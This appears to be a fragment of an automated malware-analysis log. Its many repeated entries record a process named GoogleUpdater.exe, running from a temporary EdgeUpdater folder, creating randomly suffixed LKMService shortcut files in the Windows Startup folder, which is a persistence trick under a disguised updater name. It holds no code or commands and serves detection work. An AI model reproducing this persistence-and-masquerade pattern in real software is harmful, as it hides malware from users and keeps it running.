                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3028964de7754ff196fc5f65d2b4c560.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d9b4a643bafa4bc7a2041b7b9bd6d870.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a7612ab9a5e54eb893381398404e0fd2.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_25ff465526854bcdac9a181958e7ec96.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dd4d6da60a7c4c41bef8133ffd90965a.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c2281b197e5442038e12b56a6db4504e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e1feb6770ad54d54b001f389b692801f.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a964da484ed1427cbf42292e8abaebb9.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d4df73eb8fd243d2ad35d162740d5b28.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_314b60bb748b4f6b976e2d0eecb17972.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f4cfde8b6ccc4b668b7c1c1e870155c1.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0569158bb18f4effb4e32518b42d2313.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_48a81e86e73e403a9742ed3357a802e3.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_199bb3472295488cabad894564f03fa2.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a44be0a129284b71b0de15b4ecbfd9a7.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_792356e87d174e8ea4e4ecd933721f2a.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_58ca289505d846dd8942d83001a6de76.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_de6fffeb78c0435a9f4e096ceed8e0a1.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b7f1c48092234911be05e37b5fe74641.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e379655f9a9441ba96407e1b49e84575.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_038a08b804874c43b2122d2a3e322880.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b316779e589a4c72a186423a19409324.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_901a3644f2b940828259029bb56a45dd.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_59b943f5033147769f4857231ade7a5c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_064a66c0b4f84791877cf61a69344072.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_16c4bc2ab8b84bd5a677aa9e683401f9.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d355ab6318c24d2aaf9a7a6208f9b2de.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_84850bc1d1f64e4fa0d6e690210c9418.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0a2c6cf1280d48409a385c504492fda7.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7ffba0c7bdd141e1afa833d6f996dc56.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9917feff40824c7fb4946e6ec7d7882e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_30ed9b356f11489cbe7fb93afdfb1c6e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a21c32684bba4e4a8c9244aa0294b49a.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_44380a3dda5948c88116481ac271ee90.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d857b5873cc54042adfe8f95a043f803.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5a937a34438f4f40a3d8d0520438d945.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_670b7de0d79b4a0db7fbd489d31a34a4.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_934c1079682d488f957e0929586597c6.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_34f514b0d7a94330b252d6a97b2344ec.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1efc631f66ec4b2583779d22e0ef48f0.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6a2d5b01228e4e178741edb640b795ac.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_739bc088e7584eb08bd1e8216be745e1.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a4774d1262a747a6b7457c76739d7b47.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d46e9c08b09249b680fab01202d2a780.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_16b1084d710a4427b305267d5f00df63.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9e660133142d4cb68b00761868f284d8.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_199487abcc164290ada8784dac589493.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9398abda44f44115b3ace221530ad9fc.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9fc58fbff2d742be9e0a18a138fd312b.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_daaa24168da34c97a0bce2197d3d8d50.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_afa73bf599e94bd2b7475b09a0e6460e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d806bc186ebf43d2b5bf40637c4ebe88.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_85b758999a8d40afa68c5fa96d2520d3.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f8a1c979668641198eee66a33e529867.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9679a6ac9ea04a3fa131354147d9203d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d4a6e48a5e5641db8a393988b8a57ce9.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_98136efdf33f4d559aa04b056405d47f.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a303274ceba3451dbd6caa2631c9fe31.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_151f865f3fe942e7b9843b3492c1fce6.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e30bbad3646549be84a5783af83b3171.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e0810c7af1fa4201962d9374ab032d6a.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_12d1ac11f5c84b56b26427d14aab95b0.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d698a63b1edf407b999223e53b2c1140.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bf29f9fbc92e4a8a8a288742cdf2e270.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4d690632595b47bd9ec303f789a37bd8.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7b80f30be4f74b479a8a7dab0f5e6f3d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5b41f0b3a9584ad293beeb4638930931.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d7ff659c83f044368a8569ddf5504be5.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_784517e6c4f045ba8eb5448839a9fcb7.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bcf1e31945984a45baf7c1f135b40555.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cb11b06f59824321b583c97adbc592c5.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d44ea2e9d4094ec2bdac09a251a81de1.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ed4be821577648aaacb9a660750925ff.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d3d6d10b482f49139cbf2e187de304f9.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dc4a8f646eb04be3b301753b72ca6a98.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1ee8a553f5754cc7a4cdaaf586c06daf.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_376cdac5ab0f44d0b21d51fe166bbe74.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_edd8d5c7ac9c4f04a75a20fbc2959f27.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_17831eb47aff4ecd8027db437a82bd17.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7179a04c07774048a3117b90c4894a03.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_da48a62b83b2480c83c15d28e7a45272.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_894829e0f46e450c996c56410f7f7edc.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2a9720b4241b42efa760049b7e3e6fa8.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0fb66456ab654d86acb13d9dbff9a948.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bd4b6631731a4936af7ab5a5941e605c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ed2f28ec21a841198e8d391a6a40edc8.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_34e08d41523645d9badc5cbe6900e11f.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_34c51281267640f0ae3d9ac9820e4dc3.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_edbe02280c8a4b1b8a07d2abc135988c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8d421e9f92ee4b328b40bcee79e5c11f.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7eb72a49b9f44fcb926c6aff51030471.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_249434449e0b46269157616f60315285.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e55f7ce481a348a08168c4027ca8b0c3.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a07146ad1534076af36e7c03864ec1f.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bc900d908ca24a01866eef87f367b4c7.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_446a2a665e434c369a86517a2bb2a43f.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_442c032f16eb4701ab9903045618715c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4fafc468d72b404583d7ce4f849c6051.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_36e6b82a173742a08b633f00b038f55d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_84f607a4640e4f7fbb14d263fd966b76.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6bbbec313b54485c84ac04f8f6ff7a64.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2600949ca6934d2c9b9d9a9eb2590584.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_163f90fd56a2409fb44f197e9a100225.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2d078897847449eaa2db2265c27f238b.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f8255d448291451d99d5abbde5b44bac.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_839dcef050f141d18f0308d8fe42daef.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9c2719e6d9e841a7a1694688f859fdc3.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cedb194ead9c42e09a1300254f35f792.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c0012fe47f3f4b1fa7d83472951ee7d7.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_61de7cad851048faa676d46e50cf1c17.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_adebc19fd8714705ab1ceb3cedbae18c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_eedd7751b72d4cc2a2ca1e3a6ffa0ca5.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_63c7439a01b648e685a29dcbd05b4e34.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a1f3d421172b4508b6d0cfbc7dc65059.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_72cb7a88c673424a8214e4501a33e84d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_045ccb1dfd9749598c3bd2324a345dc7.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_aa971e66012f4827a61e020a2117b34e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_890598355cf54660bb32dd7c8187c84c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_545f272d2f564b25be88d8c1b4fd9e2c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c44adef62f9341e5bcea946b6a5f0f36.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_16005d3ef3e2468ea39ea944b573c043.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f5fb330b39f74870948013636182e8e2.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_37397b494c9f4da492d3e3c2855b58bc.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3d44c4c3575e43c3902d62ff75a3bd9b.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_81f135c404d341d7bc752b116b11d016.lnk
